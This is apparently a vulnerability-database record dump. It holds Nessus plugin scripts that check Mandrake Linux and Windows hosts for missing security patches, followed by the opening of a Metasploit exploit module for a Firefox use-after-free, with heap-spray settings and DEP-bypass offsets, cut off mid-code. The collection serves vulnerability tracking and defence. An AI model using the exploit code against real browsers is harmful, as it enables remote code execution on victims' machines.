value:\n\"There is a possible race condition in MandrakeUpdate that has the\npotential for users to tamper with RPMs downloaded by MandrakeUpdate\nprior to them being installed. This is due to files being stored in\nthe /tmp directory. This is a very low security-risk as most servers\nthat provide user logins shouldn't be using MandrakeUpdate. These\nupdated versions provide a fix for the problem by using /root/tmp\ninstead of /tmp.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MandrakeUpdate and / or grpmi packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MandrakeUpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:grpmi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"MandrakeUpdate-6.0-6mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"grpmi-0.9-6mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"MandrakeUpdate-6.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"grpmi-0.9-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"MandrakeUpdate-7.0-13mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"grpmi-0.9-13mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MandrakeUpdate-7.1-9mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"grpmi-7.1-9mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 3, "lastseen": "2018-08-02T07:50:41"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "bf9bf6f34c49bce5a42e75252db7a3a5"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "faa21f0434a57dda4b5fe410e015b02a"}, {"key": "href", "hash": "d092fc79a86d3ffcb33cdd743fe9ebdf"}, {"key": "modified", "hash": "e2914120514a29eeccc01e381df164d8"}, {"key": "naslFamily", "hash": "526837706681051344a466f9e51ac982"}, {"key": "pluginID", "hash": "cb0c2cf132b1e7768df2e3a97b4493b9"}, {"key": "published", "hash": "aac8b5f7a52e4c207528727e825ec5b2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "63960eb2660ba1cd051f26220562f030"}, {"key": "title", "hash": "baf82c5f44057670e481ac0239f388d8"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "04f9bb52d6a1c43438e59bfe6b0f7a6cd55603601f688a13125a7cc4aac65c9e", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["MANDRAKE_MDKSA-2000-009.NASL", "SMB_NT_MS05-009.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2006-0262"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:8854", "SECURITYVULNS:DOC:7775", "SECURITYVULNS:DOC:7769", "SECURITYVULNS:DOC:7054", "SECURITYVULNS:DOC:7053", "SECURITYVULNS:DOC:6816", "SECURITYVULNS:DOC:6436", "SECURITYVULNS:DOC:6363", "SECURITYVULNS:DOC:4128"]}, {"type": "exploitdb", "idList": ["EDB-ID:25094", "EDB-ID:21443", "EDB-ID:21442"]}, {"type": "cert", "idList": ["VU:973654", "VU:897604", "VU:738331", "VU:10277"]}], "modified": "2019-02-21T01:17:32"}, "score": {"value": -0.2, "vector": "NONE", "modified": "2019-02-21T01:17:32"}, "vulnersScore": -0.2}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:034. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61828);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_xref(name:\"MDKSA\", value:\"2000:034\");\n\n script_name(english:\"Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a possible race condition in MandrakeUpdate that has the\npotential for users to tamper with RPMs downloaded by MandrakeUpdate\nprior to them being installed. This is due to files being stored in\nthe /tmp directory. This is a very low security-risk as most servers\nthat provide user logins shouldn't be using MandrakeUpdate. These\nupdated versions provide a fix for the problem by using /root/tmp\ninstead of /tmp.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MandrakeUpdate and / or grpmi packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MandrakeUpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:grpmi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"MandrakeUpdate-6.0-6mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"grpmi-0.9-6mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"MandrakeUpdate-6.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"grpmi-0.9-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"MandrakeUpdate-7.0-13mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"grpmi-0.9-13mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MandrakeUpdate-7.1-9mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"grpmi-7.1-9mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "pluginID": "61828", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.0", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "cpe:/o:mandrakesoft:mandrake_linux:6.1", "p-cpe:/a:mandriva:linux:MandrakeUpdate", "cpe:/o:mandrakesoft:mandrake_linux:6.0", "p-cpe:/a:mandriva:linux:grpmi"], "scheme": null}
{"nessus": [{"lastseen": "2019-02-21T01:17:32", "bulletinFamily": "scanner", "description": "The linux cdrecord binary is vulnerable to a locally exploitable buffer overflow attack. When installed on a Linux-Mandrake distribution, it is by default setgid 'cdburner' (which is a group, gid: 80, that is created for the application). The overflow condition is the result of no bounds checking on the 'dev=' argument passed to cdburner at execution time. This vulnerability can be exploited to execute arbitrary commands with the gid 'cdburner'.", "modified": "2018-07-19T00:00:00", "id": "MANDRAKE_MDKSA-2000-009.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61807", "published": "2012-09-06T00:00:00", "title": "Mandrake Linux Security Advisory : cdrecord (MDKSA-2000:009)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:009. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61807);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_xref(name:\"MDKSA\", value:\"2000:009\");\n\n script_name(english:\"Mandrake Linux Security Advisory : cdrecord (MDKSA-2000:009)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The linux cdrecord binary is vulnerable to a locally exploitable\nbuffer overflow attack. When installed on a Linux-Mandrake\ndistribution, it is by default setgid 'cdburner' (which is a group,\ngid: 80, that is created for the application). The overflow condition\nis the result of no bounds checking on the 'dev=' argument passed to\ncdburner at execution time. This vulnerability can be exploited to\nexecute arbitrary commands with the gid 'cdburner'.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cdrecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cdrecord-cdda2wav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cdrecord-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mkisofs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"cdrecord-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"cdrecord-cdda2wav-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"cdrecord-devel-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"mkisofs-1.12.1-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"cdrecord-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"cdrecord-cdda2wav-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"cdrecord-devel-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"mkisofs-1.12.1-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"cdrecord-1.8.1-4mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:08:21", "bulletinFamily": "scanner", "description": "The remote host is running either Windows Media Player 9 or MSN Messenger.\n\nThere is a vulnerability in the remote version of this software that could allow an attacker to execute arbitrary code on the remote host.\n\nTo exploit this flaw, one attacker would need to set up a rogue PNG image and send it to a victim on the remote host.", "modified": "2018-11-15T00:00:00", "id": "SMB_NT_MS05-009.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16328", "published": "2005-02-08T00:00:00", "title": "MS05-009: Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16328);\n script_version(\"1.41\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2004-1244\", \"CVE-2004-0597\");\n script_bugtraq_id(12485, 12506);\n script_xref(name:\"MSFT\", value:\"MS05-009\");\n script_xref(name:\"CERT\", value:\"259890\");\n script_xref(name:\"CERT\", value:\"388984\");\n script_xref(name:\"CERT\", value:\"817368\");\n script_xref(name:\"EDB-ID\", value:\"25094\");\n script_xref(name:\"EDB-ID\", value:\"393\");\n script_xref(name:\"EDB-ID\", value:\"389\");\n script_xref(name:\"MSKB\", value:\"885492\");\n script_xref(name:\"MSKB\", value:\"887472\");\n\n script_name(english:\"MS05-009: Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)\");\n script_summary(english:\"Checks the version of Media Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the Media\nPlayer.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running either Windows Media Player 9 or MSN\nMessenger.\n\nThere is a vulnerability in the remote version of this software that\ncould allow an attacker to execute arbitrary code on the remote host.\n\nTo exploit this flaw, one attacker would need to set up a rogue PNG\nimage and send it to a victim on the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-009\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:msn_messenger\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_media_player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_messenger\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS05-009';\n\nkbs = make_list(\"885492\", \"887472\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nprogfile = hotfix_get_programfilesdir();\nif (!progfile) exit(1, \"Failed to get the Program Files directory.\");\n\nshare = hotfix_path2share(path:progfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Wmp.dll\", version:\"9.0.0.3250\", min_version:\"9.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'885492') ||\n hotfix_is_vulnerable(os:\"5.2\", file:\"Msmsgs.exe\", version:\"5.1.0.639\", min_version:\"5.1.0.0\", path:progfile, dir:\"\\Messenger\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Wmp.dll\", version:\"9.0.0.3250\", min_version:\"9.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'885492') ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Msmsgs.exe\", version:\"4.7.0.2010\", min_version:\"4.7.0.0\", path:progfile, dir:\"\\Messenger\", bulletin:bulletin, kb:'887472') ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Msmsgs.exe\", version:\"4.7.0.3001\", min_version:\"4.7.0.3000\", path:progfile, dir:\"\\Messenger\", bulletin:bulletin, kb:'887472') ||\n hotfix_is_vulnerable(os:\"5.1\", file:\"Msmsgs.exe\", version:\"5.1.0.639\", min_version:\"5.1.0.0\", path:progfile, dir:\"\\Messenger\") ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Msmsgs.exe\", version:\"5.1.0.639\", min_version:\"5.1.0.0\", path:progfile, dir:\"\\Messenger\") ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Wmp.dll\", version:\"9.0.0.3250\", min_version:\"9.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'885492')\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-09-02T06:53:36", "bulletinFamily": "exploit", "description": "This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it's possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn't employ any ASLR-free modules anymore.\n", "modified": "2017-07-24T13:26:21", "published": "2011-07-10T17:12:53", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MOZILLA_NSTREERANGE", "href": "", "type": "metasploit", "title": "Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::FF,\n :ua_minver => \"3.5\",\n :ua_maxver => \"3.6.16\",\n :os_name => OperatingSystems::Match::WINDOWS,\n :javascript => true,\n :rank => NormalRanking,\n :vuln_test => \"if (navigator.userAgent.indexOf('Windows NT 5.1') != -1 || navigator.javaEnabled()) { is_vuln = true; }\",\n })\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability',\n 'Description' => %q{\n This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'regenrecht', # discovered and sold to ZDI\n 'xero', # Shenanigans\n ],\n 'References' =>\n [\n ['CVE', '2011-0073'],\n ['OSVDB', '72087'],\n ['BID', '47663'],\n ['ZDI', '11-157'],\n ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=630919'],\n ['URL', 'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread', # graceful exit if run in separate thread\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Payload' =>\n {\n 'Space' => 0x1000, # depending on the spray size it's actually a lot more\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n [ 'Auto (Direct attack against Windows XP, otherwise through Java, if enabled)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Auto' => true,\n 'Targets' => [['navigator.userAgent.indexOf(\"Windows NT 5.1\") != -1', 1],\n ['navigator.javaEnabled()', 2]],\n 'UsesJava' => true\n }\n ],\n [ 'Firefox Runtime, fails with ASLR',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'VPOffset' => 0x781A91F8, # VirtualProtect\n 'LLOffset' => 0x781A9104, # LoadLibraryA\n 'GPAOffset' => 0x781A9014, # GetProcAddress\n 'UsesJava' => false\n }\n ],\n [ 'Java Runtime (7.10.3052.4), best against ASLR',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'VPOffset' => 0x7C37A140,\n 'LLOffset' => 0x7C37A0B8,\n 'GPAOffset' => 0x7C37A00C,\n 'UsesJava' => true\n }\n ],\n [ 'Java JVM (20.1.0.02)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'VPOffset' => 0x6D9FC094,\n 'LLOffset' => 0x6D9FC110,\n 'GPAOffset' => 0x6D9FC188,\n 'UsesJava' => true\n }\n ],\n [ 'Java Regutils (6.0.260.3)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'VPOffset' => 0x6D6C227C,\n 'LLOffset' => 0x6D6C2198,\n 'GPAOffset' => 0x6D6C2184,\n 'UsesJava' => true\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 2 2011'\n ))\n\n register_options(\n [\n OptBool.new('SEHProlog', [ true, 'Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit', true]),\n OptBool.new('CreateThread', [ true, 'Whether to execute the payload in a new thread', true]),\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true]),\n ], self.class\n )\n\n register_advanced_options(\n [\n OptInt.new('BaseOffset', [ true, 'The offset we hope to have overwritten with our heap spray', 0x0F000000 ]),\n OptInt.new('SpraySize', [ true, 'The size of our heapspray blocks', 0x100000 ]),\n OptInt.new('SprayCount', [ true, 'Number of blocks to be sprayed', 200 ]),\n OptBool.new('SetBP', [ true, 'Set a breakpoint before payload execution', false ]),\n OptBool.new('Crash', [ true, 'Usa an invalid offset to make the exploit crash (for debugging)', false ]),\n ], self.class\n )\n end\n\n def prepare_payload(target, p)\n base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1\n spray_size = datastore['SpraySize']\n\n esp_fix = 0\n callchain = []\n\n # Adding calls by hand is tedious, look at the bottom for an explanation of these values\n add_call = Proc.new { |offset, arg1, arg2, direct |\n next_offset = base_offset + (callchain.flatten.length*4)\n callchain[-1][2] = next_offset if callchain.length > 0 # connect new frame to last one\n\n if direct\n callchain <<\n [\n next_offset + 0x4 - 8,\n next_offset + 0x14,\n 0,\n arg1,\n arg2,\n next_offset + 0x18 - 0x70,\n offset\n ]\n else\n callchain <<\n [\n next_offset + 0x4 - 8,\n next_offset + 0x14,\n 0,\n arg1,\n arg2,\n offset - 0x70\n ]\n end\n }\n\n add_call.call(target['LLOffset'], base_offset, 0) # use dummy LoadLibrary call to push valid fourth VirtualProtect argument on stack\n add_call.call(target['VPOffset'], 